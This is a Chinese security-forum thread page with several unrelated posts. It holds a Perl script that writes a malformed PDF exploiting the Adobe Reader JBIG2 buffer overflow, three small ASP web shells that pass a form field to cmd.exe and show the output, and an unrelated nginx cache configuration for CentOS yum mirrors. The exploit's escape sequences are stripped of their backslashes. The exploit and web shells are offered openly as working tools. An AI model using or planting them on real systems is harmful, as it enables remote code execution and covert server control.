最近看过此主题的会员

返回列表 发帖

新手报道

进来不容易啊,那么多资源终于可以看看了

 

您可能还想看的主题:

特工间谍必备学习资源

发布免费空间、QQ号和代理资源前请先阅读本帖!!!

非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
2、本话题由:n1Ce发表,本帖发表者n1Ce符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
3、其他单位或个人使用、转载或引用本帖时必须征得发表者n1Ce和本站的同意;
4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
6、本站管理员和版主有权不事先通知发帖者而删除本文。

请多多参与发帖,不要总做伸手党!

TOP

Adobe Reader JBIG2缓冲溢出漏洞
#!/usr/bin/perl# k`sOSe 02/22/2009# http://vrt-sourcefire.blogspot.com/2009/02/have-nice-weekend-pdf-love.htmlmy $size = "x40x00";my $factor = "ABCD";my $data = "A" x 8314;print pdf();sub pdf() {"%PDF-1.5
" ."%xecxf5xf2xe1xe4xefxe3xf5xedxe5xeexf4
" ."3 0      
" ."xref
" ."3 16
" ."0000000023 00000 n
" ."0000000584 00000 n
" ."0000000865 00000 n
" ."0000001035 00000 n
" ."0000001158 00000 n
" ."0000001287 00000 n
" . "0000001338 00000 n
" ."0000001384 00000 n
" ."0000002861 00000 n
" ."0000003637 00000 n
"  ."0000005126 00000 n
" ."0000005173 00000 n
" ."0000005317 00000 n
" ."0000005370 00000 n
" ."0000005504 00000 n
" ."0000000714 00000 n
" ."trailer
" ."<</Root 4 0 R/Info 2 0 R/ID[<AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA> <AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>]/Size 19/Prev 10218>>
" ."startxref
" ."0
" ."%%EOF
" ."   
" ."4 0 obj
" ."<</Type/Catalog/Pages 1 0 R/OCProperties<</OCGs[9 0 R 13 0 R]/D<</Order[9 0 R 13 0 R]/ON[9 0 R 13 0 R]/OFF[]>>>>>>
" ."endobj
" ."         
" ."5 0 obj
" ."<</Type/Page/MediaBox[0 0 640 480]/Resources<</XObject<</Im001 7 0 R/Im002 10 0 R/Im003 11 0 R/Im004 14 0 R/Im005 16 0 R>>>>/Contents 6 0 R/Parent 1 0 R>>
" ."endobj
" ."6 0 obj
" ."<</Length 56/Filter/FlateDecode>>
" ."stream
" ."xx9cxe3*T031Px00Ax13x0bx08x9dx9cxabxa0xefx99k``xa8xe0x92xafx10xc8x85[x81x11!x05xc6x84x14x98xc0x14xc0$@xb4x05xb2
" ."Sxb0
" ."x00Jx15#,
" ."endstream
" ."endobj
" ."12 0 obj
" ."<</Subtype/Image/Width 640/Height 480/ColorSpace/DeviceGray/BitsPerComponent 1/Decode[1 0]/Interpolate true/Length 1314/Filter/JBIG2Decode>>
" ."stream
" ."x00x00x00x01" . $size . $factor . "x13" . $data . "endstream
" ."endobj
" ."13 0 obj
" ."<</Type/OCG/Name(Text Color)>>
" ."endobj
" ."14 0 obj
" ."<</Subtype/Image/Width 1/Height 1/ColorSpace/DeviceGray/BitsPerComponent 8/SMask 12 0 R/OC 15 0 R/Length 1>>
" ."stream
" ."x00
" ."endstream
" ."endobj
" ."1 0 obj
" ."<</Type/Pages/Kids[5 0 R]/Count 1>>
" ."endobj
" ."xref
" . "0 3
" . "0000000000 65535 f
" ."0000009988 00000 n
" ."0000010039 00000 n
" ."trailer
" ."<</ID[<AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA> <AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>]/Size 3>>
" ."startxref
" ."104
" ."%%EOF
";}


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

免FSO的CMD.ASP带回显网页安全辅助工具
蓝屏的原码在这儿:免FSO的CMD.ASP带回显<%@codepage=936%><%On Error Resume Next if Request("ad")<>"" then response.status="401 not Authorized" Set z=Server.CreateObject("WSCRIPT.SHELL") T=Server.mappath("lp"&amp;year(date)&amp;Session.SessionID&amp;".txt") sz=Request("Ck") If sz=""Then sz="set" z.Run "%COMSPEC% /c^"&amp;sz&amp;">"&amp;T,0,True Response.Write "<FORM method=POST><input type=text name=Ck value=’"&amp;sz&amp;"’> <input type=submit value=Run> <input type=reset value=RESET> <input type=submit
name=ad title=PasswordWantted value=RunAsAdmin></FORM><br>执行了["&amp;sz&amp;"]
{临时文件}["&amp;T&amp;"]<Iframe src=’lp"&amp;year(date)&amp;Session.SessionID&amp;".txt’ width=9
9% height=99% frameborder=0></iframe>" response.flush for i=1 to 1800000 ys=9+9 next z.run "%COMSPEC% /c echo Y│del "&amp;T,1,True set z=Nothing%>
lcx根据蓝屏的又改了一个,源码:
<%Dim oScriptDim szCMD, szTempFile ,delSet oScript = Server.CreateObject("WSCRIPT.SHELL")szCMD = Request.Form(".CMD")del=Request.Form("del")If (szCMD <> " " ) ThenszTempFile = "d:"&amp;"l"&amp;year(date)&amp;".txt" Call oScript.Run ("cmd.exe /c echo NO FSO ASPMM V0.0 by www.icehack.com>" &amp; szTempFile, 0, True)Call oScript.Run ("cmd.exe /c " &amp; szCMD &amp; " > " &amp; szTempFile, 0, True)End IfIf (del = "DELtempfile") ThenCall oScript.Run( "cmd.exe /c del "&amp;szTempFile,0,True)end if%><FORM method="POST"><input type=text name=".CMD" size=45 ><input type=submit value="Run"> <input type=submit value="DELtempfile" name=del> <%Response.Write "<Iframe src=’d:l"&amp;year(date)&amp;".txt’ width=99% height=99%
frameborder=0></iframe>" %>set oScrip=Nothing%></form>
不用这么麻烦吧。瞧zzzevazzz的:
<form method="post"><input type=text name="cmd" size=60><input type=submit value="run"></form><textarea readonly cols=80 rows=20><%response.write server.createobject("wscript.shell").exec("cmd.exe /c
"&amp;request.form("cmd")).stdout.readall%></textarea>


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

配置centos更新源的缓存服务器
如果设置源服务器为163的,你有很多服务器需要处理,那建立一个本地缓存服务器是一个很好的选择,更新一次后,那之后的更新速度可就快的要命啊。。
配置nginx为类似如下样子,自行修改自己的需求:
upstream backend {
  server mirrors.163.com:80 ;
}
server {
  #server_name  www.aslibra.com;
  server_name  mirrors.aslibra.com;
  set $index 'index.htm';
  set $store_file $request_filename;
  #root    /Data/www.aslibra.com;
  root    /Data/mirrors/mirrors.163.com;
  if ($uri ~ /$ ){
    set $store_file $request_filename$index;
  }
  location /centos/ {
    index index.htm;
    proxy_store on;
    proxy_temp_path /Data/mirrors/tmp;
    proxy_set_header Host mirrors.163.com;
    proxy_store_access user:rw group:rw all:rw;
    if ( !-e $store_file ) {
      proxy_pass http://backend;
    }
  }
}
yum的配置可以如下:
[base]
name=CentOS-$releasever - Base
baseurl=http://mirrors.aslibra.com/centos/$releasever/os/$basearch/
gpgcheck=1
gpgkey=http://mirror.centos.org/centos/RPM-GPG-KEY-CentOS-5
[updates]
name=CentOS-$releasever - Updates
baseurl=http://mirrors.aslibra.com/centos/$releasever/updates/$basearch/
gpgcheck=1
gpgkey=http://mirror.centos.org/centos/RPM-GPG-KEY-CentOS-5
[addons]
name=CentOS-$releasever - Addons
baseurl=http://mirrors.aslibra.com/centos/$releasever/addons/$basearch/
gpgcheck=1
gpgkey=http://mirror.centos.org/centos/RPM-GPG-KEY-CentOS-5
[extras]
name=CentOS-$releasever - Extras
baseurl=http://mirrors.aslibra.com/centos/$releasever/extras/$basearch/
gpgcheck=1
gpgkey=http://mirror.centos.org/centos/RPM-GPG-KEY-CentOS-5
[centosplus]
name=CentOS-$releasever - Plus
baseurl=http://mirrors.aslibra.com/centos/$releasever/centosplus/$basearch/
gpgcheck=1
enabled=0
gpgkey=http://mirror.centos.org/centos/RPM-GPG-KEY-CentOS-5
就这样OK了!


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

返回列表